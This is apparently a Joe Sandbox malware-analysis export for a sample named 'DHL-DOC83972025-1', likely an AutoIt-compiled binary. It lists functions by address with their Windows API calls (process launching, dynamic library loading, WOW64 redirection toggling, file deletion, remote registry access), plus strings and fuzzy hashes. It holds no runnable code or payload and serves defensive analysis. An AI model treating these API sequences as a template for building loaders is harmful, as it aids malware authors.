Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0
API String ID: 1227352736-4108050209
Opcode ID: 01c3e1feee294abeae6220c6669abc0d700bc5d2682eff2a6228729b6eba0b93
Instruction ID: 4f9cf93ffce41ef63766d4606d45ac9759bc83875567427ce8acbf4a38ed0afa
Opcode Fuzzy Hash: 01c3e1feee294abeae6220c6669abc0d700bc5d2682eff2a6228729b6eba0b93
Instruction Fuzzy Hash: 0151DF71604302AFD7109F28C8C5B6B77E4AF49315F04092FFD95E26A2DB78D908CB9A

Function 0047AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 0047AEA3

Part of subcall function 003F7620: _wcslen.LIBCMT ref: 003F7625

GetProcessId.KERNEL32(00000000), ref: 0047AF38
CloseHandle.KERNEL32(00000000), ref: 0047AF67

Strings

<, xrefs: 0047AE6B
@, xrefs: 0047AE72

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: 3c03e425ea4f9f24dde1cc95e65465ad36a9c02934f9c9be27bbee47268de425
Instruction ID: 763e1e6196d3f7140a2daf2367decdd5182cd306ac9ad578af1e3092bebafaa5
Opcode Fuzzy Hash: 3c03e425ea4f9f24dde1cc95e65465ad36a9c02934f9c9be27bbee47268de425
Instruction Fuzzy Hash: 4E715B70A00619DFCB15DF54C484AAEBBF1FF48314F0484AAE81AAB392C778ED55CB95

Function 0045719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00457206
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0045723C
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0045724D
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 004572CF

Strings

DllGetClassObject, xrefs: 00457242

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 4f7d035fbaf591a0f1c64dd75996ba5d801f5aabbb2405501792511ea36c554a
Instruction ID: 288d3ac3eff892292c188fc2529126eaae122ad65bb0a034ecc1ba18efdaba2b
Opcode Fuzzy Hash: 4f7d035fbaf591a0f1c64dd75996ba5d801f5aabbb2405501792511ea36c554a
Instruction Fuzzy Hash: CE419C71A04204AFDB15CF54D884A9A7BA9EF44311F2084BEBD099F20BD7B8D949CBA4

Function 00482F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00482F8D
LoadLibraryW.KERNEL32(?), ref: 00482F94
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00482FA9
DestroyWindow.USER32(?), ref: 00482FB1

Strings

SysAnimate32, xrefs: 00482F68

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: a6511de4a483d2e7a0ec0b2001a616e941f7e6537babdbcd07a0eeb507805df7
Instruction ID: 80d5de0af434f61668b32ccf88fd23c519f72086dc27d985c05a3c36bc0b2eff
Opcode Fuzzy Hash: a6511de4a483d2e7a0ec0b2001a616e941f7e6537babdbcd07a0eeb507805df7
Instruction Fuzzy Hash: E521DE71204205ABEB106F64DD80EBF37B9EF59324F100A2AFB10D22A0D7B5DC51E768

Function 00414D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00414D1E,004228E9,?,00414CBE,004228E9,004B88B8,0000000C,00414E15,004228E9,00000002), ref: 00414D8D
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00414DA0
FreeLibrary.KERNEL32(00000000,?,?,?,00414D1E,004228E9,?,00414CBE,004228E9,004B88B8,0000000C,00414E15,004228E9,00000002,00000000), ref: 00414DC3

Strings

mscoree.dll, xrefs: 00414D86
CorExitProcess, xrefs: 00414D98

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 4050e4f0fc484bbf60d369dde255f9506506b374edbb5025a27a51b794c1d269
Instruction ID: f67b8e7b84fa0227685d50cd649e1840f49ad20482eaef20398ac7bb5a572544
Opcode Fuzzy Hash: 4050e4f0fc484bbf60d369dde255f9506506b374edbb5025a27a51b794c1d269
Instruction Fuzzy Hash: 4FF04435540208BBDF115F90DC89BDEBFB5EF44752F0001BAF905A2650CB745984CB99

Function 003F4E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,003F4EDD,?,004C1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 003F4E9C
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 003F4EAE
FreeLibrary.KERNEL32(00000000,?,?,003F4EDD,?,004C1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 003F4EC0

Strings

Wow64DisableWow64FsRedirection, xrefs: 003F4EA8
kernel32.dll, xrefs: 003F4E94

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: b94aacea57ef6df3c4f139a12f76c71f64d28b04f1f358d8de4592f17554893a
Instruction ID: 8bbb6a6025578e0a075fafa09fb98840dada9822e9daaeda4258ba11409c1a2b
Opcode Fuzzy Hash: b94aacea57ef6df3c4f139a12f76c71f64d28b04f1f358d8de4592f17554893a
Instruction Fuzzy Hash: 0CE08635A025229B93331B257C9CB6F6554AF91F627060529FE00D2204DB74CD0586B8

Function 003F4E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00433CDE,?,004C1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 003F4E62
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 003F4E74
FreeLibrary.KERNEL32(00000000,?,?,00433CDE,?,004C1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 003F4E87

Strings

Wow64RevertWow64FsRedirection, xrefs: 003F4E6E
kernel32.dll, xrefs: 003F4E5B

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: 78c51bc9a8608a34c1f94b3ae0b9670e20980982652fe575c58df987e36d01b6
Instruction ID: 112e92a6e07d8ebd661fa414712a048df42e15fb21923cf218f380472265dcdc
Opcode Fuzzy Hash: 78c51bc9a8608a34c1f94b3ae0b9670e20980982652fe575c58df987e36d01b6
Instruction Fuzzy Hash: A8D0C231902A216747331B257C8CE9F2A18AF81F113060A29BA00A2114CF34CD058BF8

Function 00462947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00462C05
DeleteFileW.KERNEL32(?), ref: 00462C87
CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00462C9D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00462CAE
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00462CC0

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: a72b3ba92ddc33cfa54f91692d3813016e01afe9f2cf554eb693e9080849bca7
Instruction ID: cff3721dd62224d4733f7ca604b5f28ffe661b59fce17a3db33d635910522b58
Opcode Fuzzy Hash: a72b3ba92ddc33cfa54f91692d3813016e01afe9f2cf554eb693e9080849bca7
Instruction Fuzzy Hash: 4AB16D71D00519ABDF21DFA5CD85EEEB7BDEF48304F0040ABF609E6141EA74AA448F66

Function 0047A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 0047A427
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047A435
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047A468
CloseHandle.KERNEL32(?), ref: 0047A63D

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: 3a4950902308a478974057919919c0291026fc5bb081be7db77fcb0a67221bbd
Instruction ID: 9101f8349bdc645d4afa901e53c13368dac5fc0234f88971e44455973263b30f
Opcode Fuzzy Hash: 3a4950902308a478974057919919c0291026fc5bb081be7db77fcb0a67221bbd
Instruction Fuzzy Hash: 72A19271604301AFD720DF24C886F2AB7E5AF84714F14885EF99A9B3D2D7B4EC418B96

Function 0042BB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00493700), ref: 0042BB91
WideCharToMultiByte.KERNEL32(00000000,00000000,004C121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0042BC09
WideCharToMultiByte.KERNEL32(00000000,00000000,004C1270,000000FF,?,0000003F,00000000,?), ref: 0042BC36
_free.LIBCMT ref: 0042BB7F

Part of subcall function 004229C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0042D7D1,00000000,00000000,00000000,00000000,?,0042D7F8,00000000,00000007,00000000,?,0042DBF5,00000000), ref: 004229DE
Part of subcall function 004229C8: GetLastError.KERNEL32(00000000,?,0042D7D1,00000000,00000000,00000000,00000000,?,0042D7F8,00000000,00000007,00000000,?,0042DBF5,00000000,00000000), ref: 004229F0

_free.LIBCMT ref: 0042BD4B

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: 64fff4180e434b2fa8c47886a3fbf41696ccc4d88f3d877036c8820d2e64af6c
Instruction ID: 3040c917712896d96938e9be0a4ec278d38527fb432b08b0b2b5ecfb969084ec
Opcode Fuzzy Hash: 64fff4180e434b2fa8c47886a3fbf41696ccc4d88f3d877036c8820d2e64af6c
Instruction Fuzzy Hash: 87511B75A00229AFC710DF66AC819AEB7BCEF45354B9042BFE510E72A1DB349D418BD8

Function 0045E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0045DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0045CF22,?), ref: 0045DDFD

Part of subcall function 0045DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0045CF22,?), ref: 0045DE16

Part of subcall function 0045E199: GetFileAttributesW.KERNEL32(?,0045CF95), ref: 0045E19A

lstrcmpiW.KERNEL32(?,?), ref: 0045E473
MoveFileW.KERNEL32(?,?), ref: 0045E4AC
_wcslen.LIBCMT ref: 0045E5EB
_wcslen.LIBCMT ref: 0045E603
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0045E650

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: 68056c9c11d7e2cc7ff175481599e167ed5f96956b3e33fb16262786a5d2199f
Instruction ID: 3e3792644c2b15de30c549d8b32823fbbe235963c53c8d08b541cb978745e86b
Opcode Fuzzy Hash: 68056c9c11d7e2cc7ff175481599e167ed5f96956b3e33fb16262786a5d2199f
Instruction Fuzzy Hash: 3D5143B24083455BC724DB91DC81ADF73DC9F85345F40491FFA89D3152EE78A68C876A

Function 0047B9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 003F9CB3: _wcslen.LIBCMT ref: 003F9CBD

Part of subcall function 0047C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047B6AE,?,?), ref: 0047C9B5
Part of subcall function 0047C998: _wcslen.LIBCMT ref: 0047C9F1
Part of subcall function 0047C998: _wcslen.LIBCMT ref: 0047CA68
Part of subcall function 0047C998: _wcslen.LIBCMT ref: 0047CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0047BAA5
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0047BB00
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0047BB63
RegCloseKey.ADVAPI32(?,?), ref: 0047BBA6
RegCloseKey.ADVAPI32(00000000), ref: 0047BBB3

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: 9fc37692b305ea1e30b6f8701e84965689d60f6da53c23201f8e1d6c99fb9b84
Instruction ID: ea45b7f57c78be6f4c76c46cdf87d7c44c46ad107b91de1d7044262272379323
Opcode Fuzzy Hash: 9fc37692b305ea1e30b6f8701e84965689d60f6da53c23201f8e1d6c99fb9b84
Instruction Fuzzy Hash: EF618D71208205AFC715DF24C490F6ABBE5FF84348F14896EF4998B2A2DB35ED45CB92

Function 00458BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00458BCD
VariantClear.OLEAUT32 ref: 00458C3E
VariantClear.OLEAUT32 ref: 00458C9D
VariantClear.OLEAUT32(?), ref: 00458D10
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00458D3B

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 66edca7ca2407f22df8dcef747c12ec4cf953db31d8008b5572c24ccf374b3f2
Instruction ID: 2e849b1ca5a765950828d2652af1a0bd95aecafebdcacea5f2f65136b40d39c9
Opcode Fuzzy Hash: 66edca7ca2407f22df8dcef747c12ec4cf953db31d8008b5572c24ccf374b3f2
Instruction Fuzzy Hash: C0516B75A00219EFCB10CF58D884AAAB7F4FF89314B15855EE905EB350EB34E915CF94

Function 00468AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00468BAE
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00468BDA
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00468C32
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00468C57
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00468C5F

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: ef45519731421857a1de1e602b9930a040a0545408ff432429177c9e03fcf8de
Instruction ID: 06d479ca2b3734b4fc8d86815b9aec287f033a0e40dd2e7c0faa41041c49d1e7
Opcode Fuzzy Hash: ef45519731421857a1de1e602b9930a040a0545408ff432429177c9e03fcf8de
Instruction Fuzzy Hash: 20517F35A002199FCB01DF65C880E6EBBF1FF49314F088499E949AB3A2DB35ED45CB95

Function 00478EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 00478F40
GetProcAddress.KERNEL32(00000000,?), ref: 00478FD0
GetProcAddress.KERNEL32(00000000,00000000), ref: 00478FEC
GetProcAddress.KERNEL32(00000000,?), ref: 00479032
FreeLibrary.KERNEL32(00000000), ref: 00479052

Part of subcall function 0040F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00461043,?,75C0E610), ref: 0040F6E6
Part of subcall function 0040F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0044FA64,00000000,00000000,?,?,00461043,?,75C0E610,?,0044FA64), ref: 0040F70D

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: 7bd57d15e0aced17d2e63fb0ca680dee1e7ba83762ca51ec0a8971681e9c4526
Instruction ID: 0b96e451d444d1befc40bed93c1fca63f9628f0bb71a743d2418cc9417b3235c
Opcode Fuzzy Hash: 7bd57d15e0aced17d2e63fb0ca680dee1e7ba83762ca51ec0a8971681e9c4526
Instruction Fuzzy Hash: A7513A34600249DFCB11DF54C4949AEBBB1FF49314B0480AAE909AB362DB35ED86CB95

Function 00486B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 00486C33
SetWindowLongW.USER32(?,000000EC,?), ref: 00486C4A
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00486C73
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0046AB79,00000000,00000000), ref: 00486C98
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00486CC7

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
